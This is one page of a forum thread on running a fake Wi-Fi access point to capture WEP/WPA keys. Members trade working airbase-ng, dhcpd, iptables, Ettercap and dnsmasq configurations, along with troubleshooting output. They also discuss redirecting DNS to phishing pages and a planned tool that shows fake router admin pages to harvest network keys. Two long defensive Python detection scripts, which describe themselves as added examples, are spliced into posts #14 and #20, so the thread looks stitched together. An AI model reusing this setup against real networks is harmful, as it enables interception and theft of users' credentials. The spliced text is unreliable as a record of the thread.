Page 2 of 8 (results 11 to 20 of 80)

Thread: Fake AP WEP/WPA key grab- Video and commands

  1. #11 (Member, Join Date Sep 2008, Posts 146)

    quick update on the ettercap issue.

    Putting ettercap in bridged mode actually kills the service since it tries to bridge the two connections itself (I think). However, if you could disable the ettercap bridging functions it would probably work just fine since everything needed for ettercap is in place. I know wireshark and a few other programs can sniff traffic just as well, but it would be nice to be able to see passwords come in in real time rather than having to pull them out of wireshark later.

    The solution I think would be to just put in a run-of-the-mill logger, even a commercial one would work. The nice thing about the transparent setup is that you have complete access to anything that a normal sysadmin would, you own the network. It's the same as setting up a NAT firewall in a corporate office and then sniffing/filtering the traffic. There is no need to be sneaky about it.

    What I'd really like to do is set up an internal DNS server that only filters some of the queries to phishing pages then routes the rest of the traffic to the net as usual.

    One other question: you already need 2 wireless cards to pull this off. Can the same card that is hosting the AP also inject deauths? (for bumping clients off their legit networks) Or would I need a 3rd card to do that properly? I'll test it later when home.
    Morpheus: "You take the blue pill - the story ends, you wake up in your bed and believe whatever you want to believe. You take the red pill - you stay in Wonderland and I show you how deep the rabbit-hole goes."

    Neo: "What if I take both?"

    Morpheus: "Don't do that! You end up like Nick Nolte!"

  2. #12 (Junior Member, Join Date Sep 2008, Posts 32)

    I was thinking that Ettercap in Bridging Mode could be used instead of IP forwarding, making things a little easier to set up. I believe Ettercap controls the IP forwarding engine when it is doing its thing. So in addition to performing the inline sniffing and capture, you could also create some custom filters to intercept the DNS / HTTP requests that you are interested in and forward them to your own servers.

    I did a little experimenting with this yesterday with mixed results. I was running BT3 in a VirtualBox using NAT, and couldn't figure out how to disable VB's internal DHCP server. So my wireless client (connecting to the fake AP on BT) kept getting two sets of DHCP responses.

    I then switched VB to use host networking mode and things seemed to get initialized properly, the client was able to connect, get an IP address, etc., but as soon as I tried loading some web traffic on the client, Ettercap kept crashing.

    In order to bridge two interfaces in Ettercap, they must be the same type (Ethernet, in my case) and they must have the same MTU size, so I set them both to 1400.

    For reference, here is the Ettercap command I used:
    Code:
    ettercap -T -B eth0 -i at0

    Where I wanted to bridge the wireless client to the local BT ethernet interface which provided connectivity to the Internet.

    That's about as far as I got with Ettercap, not sure what else I could try to prevent it from crashing.

    Don't want to derail the topic, just thought it would be interesting to try.

    -- Tom

  3. #13 (Member, Join Date Feb 2010, Posts 204)

    Quote Originally Posted by Revelati:
    One other question: you already need 2 wireless cards to pull this off. Can the same card that is hosting the AP also inject deauths? (for bumping clients off their legit networks) Or would I need a 3rd card to do that properly? I'll test it later when home.

    should be able to use the one card to deauth as it's in monitor mode, give it a try

    I can see this project going in many directions depending on what the user wants to do.

    ettercap --- Another way is a 3rd wireless card, running on virtual, and using that to poison

  4. #14 (Good friend of the forums, Join Date Jun 2008, Posts 425)

    Quote Originally Posted by Revelati:
    What I'd really like to do is set up an internal DNS server that only filters some of the queries to phishing pages then routes the rest of the traffic to the net as usual.

    Dnsmasq seems to work. Create a file and put "dnsmasq -C /root/dns.conf" in it and give it execute privs, then create a file called dns.conf and put this in it:
    Code:
    resolv-file=/root/resolv.conf
    address=/www.google.com/127.0.0.1
    In the file /root/resolv.conf put:
    Code:
    nameserver 127.0.0.1
    nameserver 192.168.1.1   # internet gateway

    On google.com it will redirect to your web site, others will go to the gateway and the internet.

    Hope it helps
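    The dnsmasq redirect in this post is also what a client on such a network can look for from its own side. As an added example (not code from the thread or from dnsmasq), the following Python checks a set of resolver answers, constructed inline, for public hostnames that resolve into loopback, RFC 1918 or link-local space, and for many unrelated names collapsing onto one address; the hostnames and addresses are assumptions, with the documentation ranges 203.0.113.0/24 and 198.51.100.0/24 standing in for real public servers.

```python
"""Client-side check for DNS answers that point public names at the access
network, the effect of a dnsmasq rule like `address=/www.google.com/127.0.0.1`.

Added example for this thread, not code from the thread or from dnsmasq.
Hostnames and addresses below are constructed; 203.0.113.0/24 and
198.51.100.0/24 are documentation ranges standing in for real public servers.
"""
import ipaddress
from collections import defaultdict
from typing import Dict, List, Tuple

# Address space the access network itself can serve content from: the
# client's own loopback, RFC 1918 space, link-local and the "this network"
# range. Deliberately narrower than ipaddress.is_global (see usage note).
LOCAL_NETS = [ipaddress.ip_network(n) for n in (
    "0.0.0.0/8", "10.0.0.0/8", "127.0.0.0/8", "169.254.0.0/16",
    "172.16.0.0/12", "192.168.0.0/16",
)]


def is_local(address: str) -> bool:
    """True if the address lies in a range no public web server can have."""
    ip = ipaddress.ip_address(address)
    return any(ip in net for net in LOCAL_NETS)


def flag_local_answers(answers: Dict[str, List[str]]) -> List[Tuple[str, str]]:
    """(name, address) pairs where a name resolved into local address space.

    Names that legitimately live on the LAN (the router's own hostname, a
    printer) should be removed from `answers` by the caller first.
    """
    return [(name, address)
            for name, addresses in answers.items()
            for address in addresses
            if is_local(address)]


def find_collapsed_answers(answers: Dict[str, List[str]],
                           min_names: int = 3) -> Dict[str, List[str]]:
    """Addresses that at least `min_names` distinct names resolve to.

    A wildcard redirect (every name answered with the rogue host) shows up as
    unrelated names collapsing onto one address; shared CDN hosting can look
    similar, so treat this as a prompt to re-check with a trusted resolver.
    """
    names_by_address = defaultdict(set)
    for name, addresses in answers.items():
        for address in addresses:
            names_by_address[address].add(name)
    return {address: sorted(names)
            for address, names in names_by_address.items()
            if len(names) >= min_names}


# Constructed answers as a client on such a network might receive them.
SAMPLE_ANSWERS: Dict[str, List[str]] = {
    "www.google.com": ["127.0.0.1"],        # the dnsmasq rule quoted above
    "mail.example.net": ["203.0.113.10"],   # untouched public answer
    "news.example.org": ["198.51.100.7"],   # untouched public answer
    "shop.example.com": ["10.0.0.1"],       # redirected to the AP itself
    "login.example.com": ["10.0.0.1"],
    "bank.example.com": ["10.0.0.1"],
}


def report(answers: Dict[str, List[str]]) -> Dict[str, object]:
    """Bundle both checks into one result for logging or alerting."""
    return {
        "local_answers": flag_local_answers(answers),
        "collapsed": find_collapsed_answers(answers),
    }


if __name__ == "__main__":
    result = report(SAMPLE_ANSWERS)
    for name, address in result["local_answers"]:
        print(f"SUSPECT {name} -> {address} (local address space)")
    for address, names in result["collapsed"].items():
        print(f"SUSPECT {address} answers for {len(names)} names: {', '.join(names)}")
```

    The local-range check is deliberately narrower than `ipaddress.is_global`: it targets only the address space the access network itself can serve from, so documentation and other reserved ranges are not flagged. Legitimate CDN hosting does put several names on one address, which is why the collapse heuristic is a prompt to compare against a trusted resolver over another path rather than a verdict on its own.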

  5. #15 (Senior Member, Join Date Apr 2008, Posts 2,008)

    So I finally got around to trying this out in real life and figured that I would start up slow with a simple transparent fake AP before moving on. The tutorial was very easy to follow, thank you once more for your input; however, I did run into some problems that I hope somebody will be able to help me out with.

    Setup:
    Running BT3 in VMware Fusion on a MacBook and an iPod touch as the victim.
    wlan0 - Alfa 500mw used for the fake AP.
    eth0 - bridged connection from VMware (192.168.1.3).
    192.168.1.1 - router IP.

    Setting up the Fake AP:
    Code:
    bt ~ # modprobe tun
    bt ~ # airbase-ng -e "Open" wlan0 -v
    15:04:45  Created tap interface at0
    15:04:45  Trying to set MTU on at0 to 1500
    15:04:45  Trying to set MTU on wlan0 to 1800
    error setting MTU on wlan0
    15:04:45  MTU on wlan0 remains at 1500
    15:04:45  Access Point with BSSID 00:11:09:D8:90:34 started.
    ...
    15:09:28  Got directed probe request from 00:22:41:XX:XX:XX - "Open"
    15:09:29  Got an auth request from 00:22:41:XX:XX:XX (open system)
    15:09:29  Client 00:22:41:XX:XX:XX associated (unencrypted) to ESSID: "Open"
    Modifying /etc/dhcpd.conf:
    Code:
    ddns-update-style ad-hoc;
    default-lease-time 600;
    max-lease-time 7200;

    subnet 10.0.0.0 netmask 255.255.255.0 {
    option routers 10.0.0.1;
    option subnet-mask 255.255.255.0;
    # 10.0.0.0 is the network address; the directed broadcast for a /24 is .255
    option broadcast-address 10.0.0.255;
    option domain-name-servers 10.0.0.1;
    range dynamic-bootp 10.0.0.16 10.0.0.55;
    }
    Configuring at0:
    Code:
    bt ~ # ifconfig lo up
    bt ~ # ifconfig at0 up
    bt ~ # ifconfig at0 10.0.0.1 netmask 255.255.255.0
    bt ~ # ifconfig at0 mtu 1400
    bt ~ # route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
    bt ~ # iptables --flush
    bt ~ # iptables --table nat --flush
    bt ~ # iptables --delete-chain
    bt ~ # iptables --table nat --delete-chain
    bt ~ # iptables -t nat -A PREROUTING -p udp -j DNAT --to 192.168.1.1
    bt ~ # iptables -P FORWARD ACCEPT
    bt ~ # iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE
    Starting dhcpd server:
    Code:
    bt ~ # killall dhcpd
    dhcpd: no process killed
    bt ~ # dhcpd -d -f -cf /etc/dhcpd.conf at0
    Internet Systems Consortium DHCP Server V3.0.6
    Copyright 2004-2007 Internet Systems Consortium.
    All rights reserved.
    For info, please visit http://www.isc.org/sw/dhcp/
    Wrote 0 leases to leases file.
    Listening on LPF/at0/00:11:09:d8:90:34/10.0.0/24
    Sending on   LPF/at0/00:11:09:d8:90:34/10.0.0/24
    Sending on   Socket/fallback/fallback-net
    DHCPDISCOVER from 00:22:41:XX:XX:XX via at0
    DHCPOFFER on 10.0.0.55 to 00:22:41:XX:XX:XX (iPod-Touch) via at0
    DHCPREQUEST for 10.0.0.55 (10.0.0.1) from 00:22:41:XX:XX:XX (iPod-Touch) via at0
    DHCPACK on 10.0.0.55 to 00:22:41:XX:XX:XX (iPod-Touch) via at0
    Checking ARP entries:
    Code:
    bt ~ # arp -n -v -i at0
    Address                  HWtype  HWaddress           Flags Mask            Iface
    10.0.0.55                ether   00:22:41:XX:XX:XX   C                     at0
    Entries: 2      Skipped: 1      Found: 1
    Victim dhcp entries:
    Code:
    IP: 10.0.0.55
    Netmask: 255.255.255.0
    Router: 10.0.0.1
    DNS: 192.168.1.1
    Check if the victim is reachable:
    Code:
    bt ~ # ping 10.0.0.55 -I at0
    PING 10.0.0.55 (10.0.0.55) from 10.0.0.1 at0: 56(84) bytes of data.
    64 bytes from 10.0.0.55: icmp_seq=1 ttl=64 time=5.06 ms
    64 bytes from 10.0.0.55: icmp_seq=2 ttl=64 time=3.14 ms
    As you can see both the fake AP and the dhcpd server are running fine and the victim is able to connect and is assigned an IP that is reachable. However, the victim is unable to surf the net, so obviously the transparency is not working as intended, probably due to something that I have overlooked. Any help at all is appreciated.
    -Monkeys are like nature's humans.

  6. #16 M1ck3y (Member, Join Date Jul 2008, Location Lost in the darkness, Posts 72)

    I would be so glad to help you =Tron=, but I'm in a mess with the dhcp config which is not working on my testing network.

    First, I'm glad to tell you that me and some members from my French forum are working on a tool called GTWPA which will offer an automatic WPA/Rogue-AP/Fake-admin-panel-asking-for-the-key attack with airbase-ng. We are actually making fake webpages asking for the key, here are 2 preview examples:

    Livebox

    Numericable

    The webpages will get the WPA key with PHP and write them into text files, we will probably make logs and a "stats" function which will display the date&time/essid/key so that the user will easily keep all the collected data. We will make webpages from administration panels in English, you can help us by downloading the webpage from your administration panel interface (in Firefox File, Save page as... .html) and give the pages and associated files to us right here, or on the French forum in this topic: Technique de recuperation de clef WPA par rogue et PHP., use Google translation if you don't understand French.

    Ok, so to develop this tool, we need to know the right and functional commands before starting to script something... I just made a few tests, following your example, and it was unsuccessful on my testing network. The target was a WPA TKIP network, and I didn't even manage to get the client truly connected to the rogue AP.

    Airbase-ng was saying it was alright:

    Code:
    08:58:16  Got an auth request from 00:12:F0:6F:ED:38 (open system)
    08:58:16  Client 00:12:F0:6F:ED:38 associated (WPA1;TKIP) to ESSID: "linksys"
    08:58:20  Got directed probe request from 00:12:F0:6F:ED:38 - "linksys"
    08:58:20  Got directed probe request from 00:12:F0:6F:ED:38 - "linksys"
    08:58:20  Got broadcast probe request from 00:12:F0:6F:ED:38
    08:58:21  Got directed probe request from 00:12:F0:6F:ED:38 - "linksys"
    08:58:21  Got directed probe request from 00:12:F0:6F:ED:38 - "linksys"
    08:58:21  Got broadcast probe request from 00:12:F0:6F:ED:38
    08:58:22  Got directed probe request from 00:12:F0:6F:ED:38 - "linksys"
    08:58:22  Got an auth request from 00:12:F0:6F:ED:38 (open system)
    08:58:22  Client 00:12:F0:6F:ED:38 associated (WPA1;TKIP) to ESSID: "linksys"
    But I could see on the client (windoz XP wireless zero) screen that he was trying to get an IP, disconnecting, trying to get an IP... Until he disconnects totally and I had to manually stop and restart the wireless card.

    In fact, I could see that he couldn't get an IP because the dhcp stopped, it seems that the at0 was down, although it was up when I launched the attack:

    Code:
    bt ~ # dhcpd -d -f -cf /etc/dhcpd.conf at0
    Internet Systems Consortium DHCP Server V3.0.6
    Copyright 2004-2007 Internet Systems Consortium.
    All rights reserved.
    For info, please visit http://www.isc.org/sw/dhcp/
    Wrote 0 leases to leases file.
    Listening on LPF/at0/00:0c:41:d3:12:81/10.0.0/24
    Sending on   LPF/at0/00:0c:41:d3:12:81/10.0.0/24
    Sending on   Socket/fallback/fallback-net
    receive_packet failed on at0: Network is down
    
    bt ~ #
    Here is my testing config:
    BT3 is @ 192.168.1.12
    Router is @ 192.168.1.1
    netmask 255.255.255.0
    gateway 192.168.1.1
    dns 192.168.1.1
    Internet via eth0

    So that's a basic, standard network scheme, I can't understand what's going wrong. Is that a problem with WPA encryption? Airbase-ng is supposed to work with it, I use this command for the Rogue AP:

    Code:
    modprobe tun
    airbase-ng -a 00:0C:41:D3:12:81 -e linksys -v -c 1 -z 2 wlan0
    As you could make the rogue almost functional, do you have any tip that could help us? I know all this is a lot of work, but when we get the functional commands we will start to develop our tool specially for BT3, and create new "fake" webpages so that everyone will be able to easily use those nice features airbase-ng provides.

    Please don't be afraid if all the MAC addresses are in clear, they are all spoofed anyway, and I'm working on my own network of course. If anyone can help us making this work... And I wish to say thx to all of you here working on this, that's very interesting and we're just at the beginning of new really powerful attacks
    Last edited by M1ck3y; 08-05-2010 at 09:48 PM.
    --~ Internet is in the air we are breathing, so it should be free for everyone. We'll get there, just wait and see... ~--

  7. #17 (Member, Join Date Sep 2008, Posts 146)

    To Tron,

    I ran into this problem myself and I think I know what the trouble is. If you can ping sites on the internet but can't seem to get the DNS servers to respond then it is likely an issue with UDP not being forwarded properly. I'm not sure why this keeps DNS queries from showing up but it comes down to this little line in iptables.

    My line:
    iptables -t nat -A PREROUTING -p udp --dport 53 -j DNAT --to 192.168.1.1

    Your line:
    iptables -t nat -A PREROUTING -p udp -j DNAT --to 192.168.1.1


    Perhaps the "--dport 53" setting is required, that was the only difference I could find. I'm still having problems with my own configuration. I can only ping google on the outside, can't ping or DNS to anything other than google, which is really weird.

    There are 8 more pages of discussion about this topic in another thread:
    http://forums.remote-exploit.org/sho...t=17692&page=6

    It may help answer a few questions to read through that, it helped me get up and running even with zero knowledge of masquerading and iptables. Even though hm2075 beat me to getting it operational *shakes fist!*

  8. #18 (Good friend of the forums, Join Date Jun 2008, Posts 425)

    Quote:
    bt ~ # modprobe tun
    bt ~ # airbase-ng -e "Open" wlan0 -v
    15:04:45 Created tap interface at0
    15:04:45 Trying to set MTU on at0 to 1500
    15:04:45 Trying to set MTU on wlan0 to 1800
    error setting MTU on wlan0
    15:04:45 MTU on wlan0 remains at 1500
    15:04:45 Access Point with BSSID 00:11:09:D8:90:34 started.
    ...
    15:09:28 Got directed probe request from 00:22:41:XX:XX:XX - "Open"
    15:09:29 Got an auth request from 00:22:41:XX:XX:XX (open system)
    15:09:29 Client 00:22:41:XX:XX:XX associated

    sorry to be a pain, but don't you need -P -C "1-100" as the airbase won't respond to probes, right?

  9. #19 (Member, Join Date Feb 2010, Posts 204)

    If the victim can't surf the internet then try using the IP address for the webpage instead.

    i.e. http://64.233.183.132/ for google

    If that works then it is a DNS issue

    I too have had problems with airbase-ng not working with -P command, still working on that aspect,

    what we need is the victim to be disconnected from his/her own connection, they then probe and our ap responds and allows connection.

    oh and don't be thick like me and have airodump running as well, it cycles through the channels hence no connection ever

  10. #20 (Member, Join Date Feb 2010, Posts 204)

    I think your problem is the port forwarding, in Ubuntu I enabled it elsewhere.

    backtrack users -- don't forget
    Code:
    echo 1 > /proc/sys/net/ipv4/ip_forward

    Code:
    dhcpd -cf dhcpd.conf -lf dhcpd.leases at0
    route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
    echo 1 > /proc/sys/net/ipv4/ip_forward
    iptables -t nat -A POSTROUTING --out-interface wlan0 -j MASQUERADE
    iptables --append FORWARD --in-interface at0 -j ACCEPT
    iptables -t nat -A PREROUTING -p udp --dport 53 -j DNAT --to 192.168.1.1


    regarding airbase, I suggest you go for a basic setup with no probe response, get that working and then try something else, otherwise it will take twice as long to identify your problems

    oh and another thing, if you are going to use the probe command, somehow blacklist your own ap if using another wireless card, otherwise you get probes coming from all directions
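    Posts #16 and #20 between them describe the three things a rogue AP built on airbase-ng does on the air: beacon a known ESSID, clone a known BSSID with -a on its own channel and security settings, and answer any probe with -P. As an added example, not code from the thread or from airbase-ng, here is a Python classifier that runs the matching checks over constructed beacon and probe-response records against an authorised-AP inventory. The inventory, the channel and security values and the probed ESSIDs are assumptions; the two BSSIDs and the ESSIDs linksys and Open are the values quoted in this thread.

```python
"""Wireless-side detection for the rogue-AP patterns discussed in this thread.

Added example, not code from the thread or from airbase-ng. It compares a list
of observed beacon / probe-response records (constructed below) against an
inventory of authorised access points and reports:
  * evil-twin:    our ESSID beaconed by a BSSID we do not operate
  * cloned-bssid: our BSSID seen with an ESSID, channel or security setting
                  we do not use (the airbase-ng -a / -c / -z combination)
  * karma-style:  one BSSID answering probes for many ESSIDs (airbase-ng -P)
"""
from collections import defaultdict
from dataclasses import dataclass
from typing import Dict, List, Tuple


@dataclass(frozen=True)
class Frame:
    essid: str
    bssid: str
    channel: int
    security: str          # "OPEN", "WPA1/TKIP", "WPA2/CCMP", ...
    kind: str = "beacon"   # "beacon" or "probe-response"


@dataclass(frozen=True)
class Finding:
    kind: str
    bssid: str
    essid: str
    detail: str


# Authorised APs: BSSID -> (ESSID, channel, security). Constructed inventory;
# the BSSID is the one quoted in post #16, treated here as the real router.
AUTHORISED: Dict[str, Tuple[str, int, str]] = {
    "00:0c:41:d3:12:81": ("linksys", 6, "WPA2/CCMP"),
}
OUR_ESSIDS = {essid for essid, _, _ in AUTHORISED.values()}


def classify(frames: List[Frame]) -> List[Finding]:
    """Check each beacon against the inventory; one finding per distinct case."""
    findings: List[Finding] = []
    seen = set()
    for f in frames:
        if f.kind != "beacon":
            continue
        bssid = f.bssid.lower()
        key = (bssid, f.essid, f.channel, f.security)
        if key in seen:
            continue
        seen.add(key)
        if bssid in AUTHORISED:
            essid, channel, security = AUTHORISED[bssid]
            if (f.essid, f.channel, f.security) != (essid, channel, security):
                findings.append(Finding(
                    "cloned-bssid", bssid, f.essid,
                    f"expected {essid!r} ch {channel} {security}, "
                    f"saw {f.essid!r} ch {f.channel} {f.security}"))
        elif f.essid in OUR_ESSIDS:
            findings.append(Finding(
                "evil-twin", bssid, f.essid,
                f"our ESSID beaconed by unknown BSSID on ch {f.channel} ({f.security})"))
    return findings


def karma_responders(frames: List[Frame], min_essids: int = 3) -> Dict[str, List[str]]:
    """BSSIDs that answered probe requests for at least `min_essids` distinct ESSIDs."""
    answered = defaultdict(set)
    for f in frames:
        if f.kind == "probe-response":
            answered[f.bssid.lower()].add(f.essid)
    return {b: sorted(e) for b, e in answered.items() if len(e) >= min_essids}


# Constructed observations: the real AP, a clone of its BSSID on another
# channel and cipher suite, a second card beaconing our ESSID open, and the
# same card answering probes for networks nobody here operates.
SAMPLE_FRAMES = [
    Frame("linksys", "00:0c:41:d3:12:81", 6, "WPA2/CCMP"),
    Frame("linksys", "00:0C:41:D3:12:81", 1, "WPA1/TKIP"),
    Frame("linksys", "00:11:09:d8:90:34", 1, "OPEN"),
    Frame("Open", "00:11:09:d8:90:34", 1, "OPEN"),
    Frame("homewifi", "00:11:09:d8:90:34", 1, "OPEN", "probe-response"),
    Frame("coffeeshop", "00:11:09:d8:90:34", 1, "OPEN", "probe-response"),
    Frame("airport-free", "00:11:09:d8:90:34", 1, "OPEN", "probe-response"),
]


if __name__ == "__main__":
    for finding in classify(SAMPLE_FRAMES):
        print(f"{finding.kind:13} {finding.bssid} {finding.essid!r}: {finding.detail}")
    for bssid, essids in karma_responders(SAMPLE_FRAMES).items():
        print(f"karma-style   {bssid} answered probes for: {', '.join(essids)}")
```

    Feed it with records from whatever capture your monitor interface already produces; the point is the rule set. A BSSID you own appearing with the wrong channel or cipher suite, your ESSID from a BSSID you do not own, and one BSSID answering probes for many ESSIDs are each cheap to detect on their own and together cover the setups shown in this thread.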

